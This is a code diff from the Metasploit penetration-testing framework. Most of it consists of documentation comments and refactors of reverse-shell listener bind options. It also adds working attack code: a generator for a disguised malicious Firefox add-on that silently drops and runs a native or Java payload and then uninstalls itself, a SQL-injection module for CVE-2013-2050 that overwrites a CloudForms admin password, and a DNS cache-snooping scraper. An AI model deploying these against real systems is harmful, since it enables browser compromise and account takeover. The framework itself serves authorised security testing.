@ -244,9 +267,11 @@ class ReadableText
return output
end
#
# Dumps information about a module, just the basics.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_basic_module(mod, indent = '')
# General
output = "\n"
@ -277,13 +302,16 @@ class ReadableText
end
#No current use
def self.dump_generic_module(mod, indent = '')
end
#
# Dumps the list of options associated with the
# supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_options(mod, indent = '')
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -309,9 +337,11 @@ class ReadableText
return tbl.to_s
end
#
# Dumps the advanced options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_advanced_options(mod, indent = '')
output = ''
pad = indent
@ -333,9 +363,11 @@ class ReadableText
return output
end
#
# Dumps the evasion options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_evasion_options(mod, indent = '')
output = ''
pad = indent
@ -358,6 +390,11 @@ class ReadableText
return output
end
# Dumps the references associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_references(mod, indent = '')
output = ''
@ -372,9 +409,13 @@ class ReadableText
output
end
#
# Dumps the contents of a datastore.
#
# @param name [String] displayed as the table header.
# @param ds [Msf::DataStore] the DataStore to dump.
# @param indent [Integer] the indentation size.
# @param col [Integer] the column width.
# @return [String] the formatted DataStore contents.
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent,
@ -392,9 +433,17 @@ class ReadableText
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
end
#
# Dumps the list of active sessions.
#
# @param framework [Msf::Framework] the framework to dump.
# @param opts [Hash] the options to dump with.
# @option opts :session_ids [Array] the list of sessions to dump (no
# effect).
# @option opts :verbose [Boolean] gives more information if set to
# true.
# @option opts :indent [Integer] set the indentation amount.
# @option opts :col [Integer] the column wrap width.
# @return [String] the formatted list of sessions.
def self.dump_sessions(framework, opts={})
ids = (opts[:session_ids] || framework.sessions.keys).sort
verbose = opts[:verbose] || false
@ -437,12 +486,14 @@ class ReadableText
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
end
#
# Dumps the list of running jobs.
#
# If verbose is true, also prints the payload, LPORT, URIPATH and start
# time, if they exist, for each job.
#
# @param framework [Msf::Framework] the framework.
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
# and start time, if they exist, for each job.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
@ -479,10 +530,13 @@ class ReadableText
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
end
#
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
# a bit to add indention
#
# @param str [String] the string to wrap.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the wrapped string.
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
return Rex::Text.wordwrap(str, indent, col)
end

3
lib/msf/core/exploit/mixins.rb
View File

@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
# WebApp
require 'msf/core/exploit/web'
# Firefox addons
require 'msf/core/exploit/remote/firefox_addon_generator'
require 'msf/core/exploit/remote/browser_exploit_server'

13
lib/msf/core/exploit/remote/browser_exploit_server.rb
View File

@ -92,6 +92,15 @@ module Msf
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
#
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the current target
#
@ -166,8 +175,10 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method
if v.class == Regexp
if v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
else
bad_reqs << k if profile[k.to_sym] != v
end

174
lib/msf/core/exploit/remote/firefox_addon_generator.rb Normal file
View File

@ -0,0 +1,174 @@
# -*- coding: binary -*-
###
#
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
# addon that will gain a session.
#
###
module Msf
module Exploit::Remote::FirefoxAddonGenerator
# Add in the supported datastore options
def initialize( info = {} )
super(update_info(info,
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
]
],
'DefaultTarget' => 1
))
register_options( [
OptString.new('ADDONNAME', [ true,
"The addon name.",
"HTML5 Rendering Enhancements"
]),
OptBool.new('AutoUninstall', [ true,
"Automatically uninstall the addon after payload execution",
true
])
], self.class)
end
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
# 'application/x-xpinstall' MIME type
def generate_addon_xpi
if target.name == 'Generic (Java Payload)'
jar = p.encoded_jar
jar.build_manifest(:main_class => "metasploit.Payload")
payload_file = jar.pack
payload_name='payload.jar'
payload_script=%q|
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
java.lang.System.setSecurityManager(null);
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
else
payload_file = generate_payload_exe
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
|
if target.name != 'Windows x86 (Native Payload)'
payload_script = %q|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
chmod.initWithPath("/bin/chmod");
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(chmod);
process.run(true, ["+x", tmp.path], 2);
| + payload_script
end
end
zip = Rex::Zip::Archive.new
xpi_guid = Rex::Text.rand_guid
bootstrap_script = %q|
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
bootstrap_script << %Q|payload_name="#{payload_name}";|
bootstrap_script << %q|
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
|
bootstrap_script << payload_script
if (datastore['AutoUninstall'])
bootstrap_script << %q|
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
|
end
bootstrap_script << "}"
zip.add_file('bootstrap.js', bootstrap_script)
zip.add_file(payload_name, payload_file)
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>#{xpi_guid}</em:id>
<em:name>#{datastore['ADDONNAME']}</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>|)
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>|)
zip
end
end
end

59
lib/msf/core/handler/reverse_http.rb
View File

@ -83,23 +83,10 @@ module ReverseHttp
# addresses.
#
def full_uri
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST']
end
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
lhost = Rex::Socket.source_address
end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
addrs = bind_address
local_port = bind_port
scheme = (ssl?) ? "https" : "http"
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
else
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
end
uri
"#{scheme}://#{addrs[0]}:#{local_port}/"
end
#
@ -163,6 +150,7 @@ module ReverseHttp
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
], Msf::Handler::ReverseHttp)
end
@ -186,17 +174,13 @@ module ReverseHttp
comm = nil
end
# Determine where to bind the HTTP(S) server to
bindaddrs = ipv6 ? '::' : '0.0.0.0'
if not datastore['ReverseListenerBindAddress'].to_s.empty?
bindaddrs = datastore['ReverseListenerBindAddress']
end
local_port = bind_port
addrs = bind_address
# Start the HTTPS server service on this host/port
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
datastore['LPORT'].to_i,
bindaddrs,
local_port,
addrs[0],
ssl?,
{
'Msf' => framework,
@ -413,6 +397,33 @@ protected
obj.service.close_client( cli )
end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end

8
lib/msf/core/handler/reverse_https_proxy.rb
View File

@ -42,13 +42,17 @@ module ReverseHttpsProxy
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy)
register_advanced_options(
[
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseHttpsProxy)
end
end

54
lib/msf/core/handler/reverse_tcp.rb
View File

@ -53,8 +53,9 @@ module ReverseTcp
[
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
], Msf::Handler::ReverseTcp)
@ -72,13 +73,6 @@ module ReverseTcp
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
@ -87,19 +81,15 @@ module ReverseTcp
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
local_port = bind_port
addrs = bind_address
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
self.listener_sock = Rex::Socket::TcpServer.create(
'LocalHost' => ip,
'LocalPort' => datastore['LPORT'].to_i,
'LocalPort' => local_port,
'Comm' => comm,
'Context' =>
{
@ -119,11 +109,11 @@ module ReverseTcp
via = ""
end
print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}")
print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
print_error("Handler failed to bind to #{ip}:#{local_port}")
end
}
raise ex if (ex)
@ -140,7 +130,8 @@ module ReverseTcp
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) {
local_port = bind_port
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) {
client = nil
begin
@ -159,7 +150,7 @@ module ReverseTcp
end while true
}
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) {
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) {
while true
client = self.handler_queue.pop
begin
@ -241,6 +232,31 @@ module ReverseTcp
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :handler_thread # :nodoc:

54
lib/msf/core/handler/reverse_tcp_ssl.rb
View File

@ -43,7 +43,9 @@ module ReverseTcpSsl
super
register_advanced_options(
[
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseTcpSsl)
end
@ -59,13 +61,6 @@ module ReverseTcpSsl
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
@ -74,20 +69,16 @@ module ReverseTcpSsl
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
local_port = bind_port
addrs = bind_address
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'],
'LocalPort' => datastore['LPORT'].to_i,
'LocalHost' => ip,
'LocalPort' => local_port,
'Comm' => comm,
'SSLCert' => datastore['SSLCert'],
'Context' =>
@ -108,16 +99,43 @@ module ReverseTcpSsl
via = ""
end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
print_error("Handler failed to bind to #{ip}:#{local_port}")
end
}
raise ex if (ex)
end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end
end

3
lib/msf/core/module.rb
View File

@ -449,6 +449,9 @@ class Module
ch = self.compat['Nop']
elsif (mod.type == MODULE_PAYLOAD)
ch = self.compat['Payload']
if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else
return true
end

1
lib/msf/core/post/windows.rb
View File

@ -1,5 +1,6 @@
module Msf::Post::Windows
require 'msf/core/post/windows/error'
require 'msf/core/post/windows/accounts'
require 'msf/core/post/windows/cli_parse'
require 'msf/core/post/windows/eventlog'

2531
lib/msf/core/post/windows/error.rb Normal file
View File

File diff suppressed because it is too large Load Diff

44
lib/msf/core/post/windows/services.rb
View File

@ -306,6 +306,50 @@ module Services
handle["GetLastError"]
end
end
#
# Query Service Status
#
# @param (see #service_start)
#
# @return {} representing lpServiceStatus
#
# @raise (see #service_start)
#
#
def service_status(name, server=nil)
adv = session.railgun.advapi32
ret = nil
# 0x80000000 GENERIC_READ
open_sc_manager(:host => server, :access => 0x80000000) do |manager|
# Now to grab a handle to the service.
handle = adv.OpenServiceA(manager, name, 0x80000000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
status = adv.QueryServiceStatus(handle["return"],28)
if (status["return"] == 0)
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
end
vals = status['lpServiceStatus'].unpack('L*')
adv.CloseServiceHandle(handle["return"])
ret = {
:type => vals[0],
:state => vals[1],
:controls_accepted => vals[2],
:win32_exit_code => vals[3],
:service_exit_code => vals[4],
:check_point => vals[5],
:wait_hint => vals[6]
}
end
return ret
end
end
end

1
lib/msf/util/exe.rb
View File

@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0]

22
lib/rex/elfscan/scanner.rb
View File

@ -1,4 +1,5 @@
# -*- coding: binary -*-
require 'metasm'
module Rex
module ElfScan
@ -27,6 +28,26 @@ class Generic
rva = hit[0]
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
$stdout.puts elf.ptr_s(rva) + " " + message
if(param['disasm'])
message.gsub!("; ", "\n")
if message.include?("retn")
message.gsub!("retn", "ret")
end
begin
d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble
rescue Metasm::ParseError
d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*'))
end
addr = 0
while ((di = d2.disassemble_instruction(addr)))
disasm = "0x%08x\t" % (rva + addr)
disasm << di.instruction.to_s
$stdout.puts disasm
addr = di.next_addr
end
end
end
end
@ -203,4 +224,3 @@ end
end
end
end

6
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
View File

@ -27,6 +27,10 @@ class Def_advapi32
def self.create_dll(dll_path = 'advapi32')
dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function('QueryServiceStatus', 'DWORD', [
['LPVOID', 'hService', 'in'],
['PBLOB', 'lpServiceStatus', 'out']])
dll.add_function('CredEnumerateA', 'BOOL', [
['PCHAR', 'Filter', 'in'],
['DWORD', 'Flags', 'in'],
@ -2089,10 +2093,8 @@ class Def_advapi32
["PBLOB","pvContext","in"],
])
return dll
end
end
end; end; end; end; end; end; end

2
modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>|
template = template.gsub(/^\t\t/, '')
template = template.gsub(/^ {4}/, '')
template = template.gsub(/\n/, '')
connect

175
modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb Normal file
View File

@ -0,0 +1,175 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'bcrypt'
require 'digest'
require 'openssl'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in the "explorer"
action of "miq_policy" controller of the Red Hat CloudForms Management
Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
changing the password of the target account to the specified password.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2050'],
['CWE', '89'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
],
'DefaultOptions' =>
{
'SSL' => true
},
'DisclosureDate' => 'Nov 12 2013'
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
], self.class
)
end
def password_for_newer_schema
# Newer versions use ActiveModel's SecurePassword.
BCrypt::Password.create(datastore['TARGETPASSWORD'])
end
def password_for_older_schema
# Older versions use ManageIQ's MiqPassword.
if datastore['TARGETPASSWORD'].empty?
'v1:{}'
else
password = '1234567890123456'
salt = '6543210987654321'
cipher = OpenSSL::Cipher.new('AES-256-CBC')
cipher.encrypt
cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
"v1:{#{Rex::Text.encode_base64(encrypted)}}"
end
end
def password_reset?
print_status("Trying to log into #{target_url('dashboard')} using the target account...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['TARGETUSERNAME'],
'user_password' => datastore['TARGETPASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return false
end
if res.body =~ /"Error: (.*)"/
print_error($1)
false
else
true
end
end
def run
print_status("Logging into #{target_url('dashboard')}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.body =~ /"Error: (.*)"/
print_error($1)
return
else
session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
if session.nil?
print_error('Failed to retrieve the current session id')
return
end
end
# Newer versions don't accept POST requests.
print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
'vars_get' => {
'profile[]' => value_for_newer_schema
}
)
if password_reset?
print_good('Password reset successfully')
return
else
print_error('Failed to reset password')
end
print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => datastore['HTTP_METHOD'],
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
'profile[]' => value_for_older_schema
}
)
if password_reset?
print_good('Password reset successfully')
else
print_error('Failed to reset password')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
def value_for_newer_schema
"1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
def value_for_older_schema
"1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
end

4
modules/auxiliary/bnat/bnat_scan.rb
View File

@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
ports.each_with_index do |port,i|
p.tcp_dst = port
p.tcp_src = rand(64511)+1024

116
modules/auxiliary/gather/dns_cache_scraper.rb Normal file
View File

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/dns/resolver'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Non-Recursive Record Scraper',
'Description' => %q{
This module can be used to scrape records that have been cached
by a specific nameserver. The module allows the user to test
every record from a specified file.
},
'Author' => [
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
'Rob Dixon "304geek" <rob.dixon[at]accuvant.com>'
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
]))
register_options([
OptString.new('DOMAIN', [ false, "Domain name to query for"]),
OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
], self.class)
register_advanced_options([
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
], self.class)
end
# method to scrape dns
